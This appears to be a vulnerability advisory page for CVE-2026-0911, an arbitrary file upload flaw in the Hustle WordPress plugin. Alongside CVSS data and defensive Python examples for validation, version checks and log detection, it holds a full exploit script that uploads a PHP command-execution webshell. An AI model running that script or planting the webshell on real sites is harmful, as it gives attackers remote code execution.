Security Vulnerability Report
CVE-2026-0911 CVSS 7.5 HIGH

Published: 2026-01-24 13:15:55
Last Modified: 2026-04-15 00:35:42

Description

The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce.
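The description names the root cause as "incorrect file type validation" in an import handler. The following Python block is an added illustration of that CWE-434 pattern; it is not code from the Hustle plugin and does not claim to reproduce action_import_module(). It puts the failing class of check (deciding from attacker-controlled metadata such as the multipart Content-Type or a loose extension test) beside the check an import endpoint should perform: strict filename allowlist, size cap, parse the body as the format you expect, and never write the raw upload to a web-served path. The module export format (keys module_type and settings, the list of module types) is assumed for the example.

```python
"""Added illustration of the CWE-434 pattern behind CVE-2026-0911.

Not code from the Hustle plugin. `vulnerable_accepts` is the class of check
the advisory calls "incorrect file type validation"; `hardened_import` is
what an import handler should do instead.
"""
import json
import re

MAX_IMPORT_BYTES = 1_000_000
# Export format assumed for this example; the real Hustle export format is
# not described in the advisory.
REQUIRED_KEYS = {"module_type", "settings"}
ALLOWED_MODULE_TYPES = {"popup", "slidein", "embedded", "social_sharing"}

# Exactly one extension, no separators, no path components.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.json$")


def vulnerable_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """Vulnerable check: trusts the multipart Content-Type sent by the client.

    A client can label shell.php as application/json, so this passes and a
    handler that then saves the file under its original name is exploitable.
    """
    return content_type in ("application/json", "text/plain")


def hardened_import(filename: str, content_type: str, data: bytes) -> dict:
    """Return the parsed module dict, or raise ValueError with a reason.

    `content_type` is deliberately ignored: it is attacker-controlled.
    """
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if not SAFE_NAME.match(base):          # rejects shell.php, popup.json.php
        raise ValueError(f"rejected filename {filename!r}")
    if len(data) > MAX_IMPORT_BYTES:
        raise ValueError("import too large")
    # Validate by content: it must actually be the format we expect.
    try:
        module = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise ValueError(f"not valid JSON: {exc}") from None
    if not isinstance(module, dict) or not REQUIRED_KEYS.issubset(module):
        raise ValueError("missing required module keys")
    if module["module_type"] not in ALLOWED_MODULE_TYPES:
        raise ValueError(f"unknown module_type {module['module_type']!r}")
    if not isinstance(module["settings"], dict):
        raise ValueError("settings must be an object")
    # Only this structured data is persisted (database, or a file whose name
    # the server chooses). The raw upload is never written to disk.
    return module


def check(filename: str, content_type: str, data: bytes) -> dict:
    """Run both checks on one upload and report them side by side."""
    try:
        hardened_import(filename, content_type, data)
        hardened = True
    except ValueError:
        hardened = False
    return {"vulnerable": vulnerable_accepts(filename, content_type, data),
            "hardened": hardened}


# Constructed sample inputs
WEBSHELL = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
GOOD_EXPORT = json.dumps({"module_type": "popup", "settings": {"title": "x"}}).encode()

if __name__ == "__main__":
    for name, ctype, body in [
        ("shell.php", "application/json", WEBSHELL),
        ("popup.json.php", "application/json", WEBSHELL),
        ("popup.json", "application/octet-stream", GOOD_EXPORT),
    ]:
        print(name, check(name, ctype, body))
```

The vulnerable check accepts the webshell as soon as the client claims it is JSON; the hardened one rejects it on the filename and would reject it again on content even if it were named popup.json. In a WordPress plugin the equivalent is to decide on wp_check_filetype_and_ext() plus your own content parsing, never on $_FILES[...]['type'].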

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-434 (Unrestricted Upload of File with Dangerous Type)

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry (vulnStatus: Deferred).

Affected: all versions of the Hustle plugin (WordPress.org slug wordpress-popup) up to and including 7.8.9.2, per the CVE description. The WordPress.org plugin changeset listed in the references is the patch reference supplied with the CVE; upgrade to a release later than 7.8.9.2.
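Checking whether an installation is in the affected range sounds trivial but trips people up twice: WordPress plugin versions can have four components, and a lexical comparison puts "7.8.10" before "7.8.9.2" although 7.8.10 is the newer build; and the installed version has to be read from the plugin header, not guessed from a directory name. The Python block below is an added example (not part of the advisory) that does both correctly. The plugin header sample is constructed; the main-file name and location are not taken from the page.

```python
"""Added example: is an installed Hustle build in the affected range
"<= 7.8.9.2"? Not part of the advisory."""
import re

LAST_AFFECTED = "7.8.9.2"


def parse_version(version: str) -> tuple:
    """'7.8.9.2' -> (7, 8, 9, 2). A trailing qualifier such as '-beta1' is dropped."""
    core = version.strip().split("-", 1)[0]
    parts = core.split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(installed: str) -> bool:
    """True when installed <= 7.8.9.2, compared component by component.

    Tuple comparison handles differing lengths: (7, 8, 9) < (7, 8, 9, 2).
    """
    return parse_version(installed) <= parse_version(LAST_AFFECTED)


# Matches the "Version:" line of a WordPress plugin header comment block.
HEADER_RE = re.compile(r"^[ \t/*#@]*Version:[ \t]*(\S+)", re.MULTILINE | re.IGNORECASE)


def version_from_plugin_header(php_source: str) -> str:
    """Pull the Version: value out of a plugin's main PHP file."""
    m = HEADER_RE.search(php_source)
    if not m:
        raise ValueError("no Version: header found")
    return m.group(1)


# Constructed sample of a plugin main-file header (not the real file).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Hustle
 * Version: 7.8.9.2
 */
"""


def assess(php_source: str) -> dict:
    """Read the header and report whether the build is affected."""
    v = version_from_plugin_header(php_source)
    return {"installed": v, "affected": is_affected(v)}


if __name__ == "__main__":
    print(assess(SAMPLE_HEADER))
    for v in ("7.8.9.1", "7.8.9.2", "7.8.10", "7.9", "8.0.0-beta1"):
        print(v, "affected" if is_affected(v) else "fixed")
```

Run it against the plugin's main PHP file on each site you manage (for example by reading the file over SSH or from a backup); anything reporting affected is True needs the update from the changeset in the references.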

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests
from bs4 import BeautifulSoup

# CVE-2026-0911 PoC - Arbitrary File Upload in Hustle WordPress Plugin
# Target: WordPress site with Hustle plugin <= 7.8.9.2
# The advisory only names action_import_module(). The AJAX action name, the
# nonce field name, the admin page slug and the upload directory used below
# are assumptions of this PoC and must be confirmed against the plugin source.

TARGET = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "password"


def get_nonce(session, target):
    """Extract the import nonce from the Hustle admin page.

    A Subscriber only reaches this page if an admin has granted the account
    Hustle module permissions, which is the precondition in the advisory.
    """
    url = f"{target}/wp-admin/admin.php?page=hustle_modules"
    response = session.get(url)
    soup = BeautifulSoup(response.text, "html.parser")
    nonce_input = soup.find("input", {"name": "hustle_module_import_nonce"})
    if nonce_input:
        return nonce_input.get("value")
    return None


def exploit(target, username, password):
    """Authenticate, fetch the nonce, then upload a PHP file via the import action."""
    session = requests.Session()

    # Step 1: Authenticate with the low-privileged account
    login_url = f"{target}/wp-login.php"
    login_data = {"log": username, "pwd": password, "wp-submit": "Log In"}
    session.post(login_url, data=login_data)
    # WordPress sets a wordpress_logged_in_<hash> cookie on success
    if not any(c.startswith("wordpress_logged_in_") for c in session.cookies.keys()):
        print("[-] Login failed")
        return False

    # Step 2: Get nonce
    nonce = get_nonce(session, target)
    if not nonce:
        print("[-] Failed to obtain nonce. Admin may not have granted permissions.")
        return False

    # Step 3: Upload malicious file through the module import action
    upload_url = f"{target}/wp-admin/admin-ajax.php"
    webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    files = {"file": ("shell.php", webshell, "application/octet-stream")}
    data = {
        "action": "hustle_module_import",
        "hustle_module_import_nonce": nonce,
        "hustle_module_type": "popup",
    }
    response = session.post(upload_url, data=data, files=files)

    # admin-ajax.php answers HTTP 200 even on failure ("0", "-1" or
    # {"success":false}), so the status code alone proves nothing. Assumes the
    # handler replies in wp_send_json_success() format.
    try:
        ok = response.json().get("success") is True
    except ValueError:
        ok = False
    if ok:
        print("[+] File uploaded successfully!")
        print(f"[+] Access shell at: {target}/wp-content/uploads/hustle-files/shell.php?cmd=id")
        return True
    print(f"[-] Upload failed: HTTP {response.status_code} {response.text[:200]}")
    return False


if __name__ == "__main__":
    sys.exit(0 if exploit(TARGET, USERNAME, PASSWORD) else 1)
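From the defender's side, the upload path in the PoC is a guess, but every successful exploit of a CWE-434 bug in a WordPress plugin ends the same way: a request for a PHP file under wp-content/uploads/, a directory that should never serve executable code. The Python block below is an added detection example, not part of the PoC or the advisory. It parses web server access logs in combined format, alerts on any request for executable PHP under uploads, and notes whether the same client POSTed to admin-ajax.php beforehand (the upload step). The log lines are constructed; the hustle-files directory in them is taken from the PoC and is not confirmed by the advisory.

```python
"""Added detection example: flag requests for PHP under wp-content/uploads/
in combined-format access logs. Not part of the PoC or the advisory."""
import re
from collections import defaultdict

# Apache/nginx combined log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Extensions PHP handlers commonly execute
EXEC_EXT = re.compile(r"\.(?:php\d?|phtml|phar)$", re.IGNORECASE)


def parse_line(line: str):
    """Return the fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_upload_dir_php(target: str) -> bool:
    """True when the path (query string stripped) is PHP under wp-content/uploads."""
    path = target.split("?", 1)[0]
    return "/wp-content/uploads/" in path and bool(EXEC_EXT.search(path))


def detect(lines):
    """One alert per request for PHP under uploads.

    A 2xx means the server executed or served the file (high); anything else
    (e.g. 403 from a deny rule) is still an attempt worth looking at (medium).
    """
    seen_ajax = defaultdict(int)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["target"].startswith("/wp-admin/admin-ajax.php"):
            seen_ajax[rec["ip"]] += 1
        if is_upload_dir_php(rec["target"]):
            alerts.append({
                "ip": rec["ip"],
                "path": rec["target"].split("?", 1)[0],
                "status": int(rec["status"]),
                "prior_admin_ajax_posts": seen_ajax[rec["ip"]],
                "severity": "high" if rec["status"].startswith("2") else "medium",
            })
    return alerts


# Constructed sample log lines (RFC 5737 addresses)
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jan/2026:13:20:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
    '203.0.113.7 - - [24/Jan/2026:13:20:02 +0000] "GET /wp-admin/admin.php?page=hustle_modules HTTP/1.1" 200 41233',
    '203.0.113.7 - - [24/Jan/2026:13:20:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47',
    '203.0.113.7 - - [24/Jan/2026:13:20:04 +0000] "GET /wp-content/uploads/hustle-files/shell.php?cmd=id HTTP/1.1" 200 58',
    '198.51.100.9 - - [24/Jan/2026:13:21:10 +0000] "GET /wp-content/uploads/2026/01/banner.php HTTP/1.1" 403 199',
    '198.51.100.9 - - [24/Jan/2026:13:21:11 +0000] "GET /wp-content/uploads/2026/01/banner.png HTTP/1.1" 200 10240',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The second sample client shows the preventive control that turns this class of bug from RCE into a stored file: a web server rule that refuses to execute PHP under wp-content/uploads/ (a deny for *.php in that location in .htaccess or the nginx server block) makes the shell request fail with 403 even when the upload itself succeeded.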

References

https://plugins.trac.wordpress.org/changeset/3440956/wordpress-popup (WordPress.org plugin changeset for wordpress-popup)
https://www.wordfence.com/threat-intel/vulnerabilities/id/22be5fb5-143e-4934-9f93-e17def18e883?source=cve (Wordfence Threat Intelligence entry)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0911", "sourceIdentifier": "[email protected]", "published": "2026-01-24T13:15:55.300", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2. This makes it possible for authenticated attackers, with a lower-privileged role (e.g., Subscriber-level access and above), to upload arbitrary files on the affected site's server which may make remote code execution possible. Successful exploitation requires an admin to grant Hustle module permissions (or module edit access) to the low-privileged user so they can access the Hustle admin page and obtain the required nonce."}, {"lang": "es", "value": "El plugin The Hustle – Email Marketing, Lead Generation, Optins, Popups para WordPress es vulnerable a cargas de archivos arbitrarios debido a una validación incorrecta del tipo de archivo en la función action_import_module() en todas las versiones hasta, e incluyendo, la 7.8.9.2. Esto hace posible que atacantes autenticados, con un rol de menor privilegio (por ejemplo, acceso de nivel de Suscriptor y superior), carguen archivos arbitrarios en el servidor del sitio afectado, lo que puede hacer posible la ejecución remota de código. La explotación exitosa requiere que un administrador otorgue permisos del módulo Hustle (o acceso de edición de módulo) al usuario de bajo privilegio para que puedan acceder a la página de administración de Hustle y obtener el nonce requerido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3440956/wordpress-popup", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/22be5fb5-143e-4934-9f93-e17def18e883?source=cve", "source": "[email protected]"}]}}